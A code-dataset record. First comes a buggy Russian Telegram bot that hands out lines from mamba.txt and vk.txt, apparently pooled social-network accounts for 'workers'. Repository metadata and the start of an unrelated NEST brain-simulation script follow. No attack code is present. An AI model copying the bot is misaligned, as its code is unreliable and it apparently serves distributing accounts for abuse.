s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Три")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
elif mambaresultat == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('Три')
user_markup.row('Четыре')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Три")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Четыре")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
mamba3 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2)
bot.send_message(m.chat.id, mamba3, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (mamba3)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
A = s.split('\n')
print (a)
f.close()
elif mambaresultat == '0':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(message.chat.id, "Закончились", reply_markup=user_markup)
else:
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('Три')
user_markup.row('Четыре')
user_markup.row('Пять')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Три")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Четыре")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
mamba3 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2)
bot.send_message(m.chat.id, mamba3, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (mamba3)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
A = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Пять")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
mamba2 = a.pop (0)
del a[0]
mamba3 = a.pop (0)
del a[0]
mamba4 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, если ты справишься с ними... \n '+mamba)
bot.send_message(m.chat.id, mamba1)
bot.send_message(m.chat.id, mamba2)
bot.send_message(m.chat.id, mamba3)
bot.send_message(m.chat.id, mamba4, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (mamba2)
print (mamba3)
print (mamba4)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
A = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Получить вк МСК")
def handle_text(message):
#orig_vk = open('vkorig.txt', 'r+')
rab_vk = open('vk.txt', 'r+')
vk_list = (rab_vk.read())
vklist = vk_list.split('\n')
vk_proverka = [x for x in vklist if x != '']
vkresultat = str(len(vk_proverka))
print(vkresultat)
#ovk_list = (orig_vk.read())
#ovklist = ovk_list.split('\n')
#vkresult = []
#for index in vk_proverka:
# if index in ovklist:
# vkresult.append(index)
#print(vkresult)
#print(len(vkresult))
#vkresultat = str(len(vkresult))
if vkresultat == '1' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Последний, заберешь? ", reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Только две есть \nДаже докажу: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('3')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \n Это все, что есть: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "3")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('3')
user_markup.row('4')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОсталось: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "3")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "4")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk3 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2)
bot.send_message(m.chat.id, vk3, reply_markup=user_markup)
print (vk+" "+vk1+" "+vk2+" "+vk3)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
elif vkresultat == '0' :
user_markup.row('На главную')
bot.send_message(message.chat.id, "Больше нет, ждите, пока зальют.", reply_markup=user_markup)
else :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1')
user_markup.row('2')
user_markup.row('3')
user_markup.row('4')
user_markup.row('5')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nВ сухом остатке у нас: " + vkresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "1")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vk)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vk)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "2")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vk)
bot.send_message(m.chat.id, vk1,reply_markup=user_markup)
print (vk+' '+vk1)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "3")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "4")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk3 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2)
bot.send_message(m.chat.id, vk3, reply_markup=user_markup)
print (vk+" "+vk1+" "+vk2+" "+vk3)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
@bot.message_handler(func=lambda message: message.text == "5")
def command_text_hi(m):
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
vk = vkmsk_list.pop (0)
del vkmsk_list[0]
vk1 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk2 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk3 = vkmsk_list.pop (0)
del vkmsk_list[0]
vk4 = vkmsk_list.pop (0)
del vkmsk_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ого, а сравишься?) \n' +vk)
bot.send_message(m.chat.id, vk1)
bot.send_message(m.chat.id, vk2)
bot.send_message(m.chat.id, vk3)
bot.send_message(m.chat.id, vk4, reply_markup=user_markup)
print (vk+' '+vk1+' '+vk2+' '+vk3+' '+vk4)
print (vkmsk_list)
vkmsk = open('vk.txt', 'w')
for index in vkmsk_list:
vkmsk.write(index + '\n')
vkmsk.close
vkmsk = open('vk.txt', 'r+')
svkmsk = (vkmsk.read())
vkmsk_list = svkmsk.split('\n')
print (vkmsk_list)
vkmsk.close()
if __name__=="__main__":
bot.polling()
if __name__=="__main__":
main()
|
[
"makarishche@gmail.com"
] |
makarishche@gmail.com
|
|
1e84c539079a73cab67e9517c9c96f370c7348f8
|
4b8cde0ef35b67618eea421c20a7cf0c6882b75b
|
/motor-surprise-rage.py
|
1b1a3ca04300174a8af7d846534b8936bad235e5
|
[] |
no_license
|
MeRuslan/thesis_work
|
57aa2006711e33db33d47b576a0cce047045fa66
|
935b15c611c65f77eae26c5d768ad3f363873832
|
refs/heads/master
| 2021-01-21T21:06:58.803983
| 2017-06-19T13:35:12
| 2017-06-19T13:35:12
| 94,780,166
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,085
|
py
|
from func import *
# ATTTENTION! Maybe there are some mistakes in neuron parameters!
logger = logging.getLogger('neuromodulation')
startbuild = datetime.datetime.now()
nest.ResetKernel()
nest.SetKernelStatus({'overwrite_files': True,
'local_num_threads': 8,
'resolution': 0.1})
generate_neurons(1000)
# Init parameters of our synapse models
DOPA_synparams_ex['vt'] = nest.Create('volume_transmitter')[0]
DOPA_synparams_in['vt'] = nest.Create('volume_transmitter')[0]
SERO_synparams_in['vt'] = nest.Create('volume_transmitter')[0]
SERO_synparams_ex['vt'] = nest.Create('volume_transmitter')[0]
NORA_synparams_ex['vt'] = nest.Create('volume_transmitter')[0]
nest.CopyModel('static_synapse', gen_static_syn, static_syn)
nest.CopyModel('stdp_synapse', glu_synapse, STDP_synparams_Glu)
nest.CopyModel('stdp_synapse', gaba_synapse, STDP_synparams_GABA)
nest.CopyModel('stdp_synapse', ach_synapse, STDP_synparams_ACh)
nest.CopyModel('stdp_dopamine_synapse', dopa_synapse_ex, DOPA_synparams_ex)
nest.CopyModel('stdp_dopamine_synapse', dopa_synapse_in, DOPA_synparams_in)
nest.CopyModel('stdp_serotonin_synapse', sero_synapse_ex, SERO_synparams_ex)
nest.CopyModel('stdp_serotonin_synapse', sero_synapse_in, SERO_synparams_in)
nest.CopyModel('stdp_noradrenaline_synapse', nora_synapse_ex, NORA_synparams_ex)
## - my .50
logger.debug("* * * Start connection initialisation")
####################################################################
# * * * ventral pathway * * *
connect(ldt[ldt_Ach], thalamus[thalamus_Glu], syn_type=ACh, weight_coef=0.005)
connect(ldt[ldt_Ach], bnst[bnst_Ach], syn_type=ACh, weight_coef=0.005)
connect(ldt[ldt_Ach], lc[lc_N0], syn_type=ACh, weight_coef=0.005)
connect(ldt[ldt_Ach], prefrontal[pfc_Glu0], syn_type=ACh, weight_coef=0.005)
connect(thalamus[thalamus_Glu], motor[motor_Glu0], syn_type=Glu, weight_coef=0.005)
connect(thalamus[thalamus_Glu], motor[motor_Glu1], syn_type=Glu, weight_coef=0.005)
connect(thalamus[thalamus_Glu], motor[motor_5HT], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu0], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu1], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(prefrontal[pfc_Glu0], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(prefrontal[pfc_Glu1], bnst[bnst_Glu], syn_type=Glu, weight_coef=0.005)
connect(bnst[bnst_Glu], bnst[bnst_GABA], syn_type=Glu, weight_coef=0.005)
connect(bnst[bnst_Ach], amygdala[amygdala_Ach], syn_type=ACh, weight_coef=0.005)
connect(bnst[bnst_GABA], hypothalamus[hypothalamus_pvn_GABA], syn_type=GABA, weight_coef=0.005)
connect(amygdala[amygdala_Ach], lc[lc_Ach], syn_type=ACh, weight_coef=0.005)
connect(amygdala[amygdala_GABA], bnst[bnst_GABA], syn_type=GABA, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_D1], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_D2], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_tan], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_5HT], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_Ach], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], striatum[striatum_GABA], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_GABA1], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_GABA0], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_5HT], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_NA], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_Ach], syn_type=Glu, weight_coef=0.005)
connect(amygdala[amygdala_Glu], nac[nac_DA], syn_type=Glu, weight_coef=0.005)
connect(hypothalamus[hypothalamus_pvn_GABA], motor[motor_Glu0], syn_type=GABA, weight_coef=0.005)
connect(hypothalamus[hypothalamus_pvn_GABA], motor[motor_Glu1], syn_type=GABA, weight_coef=0.005)
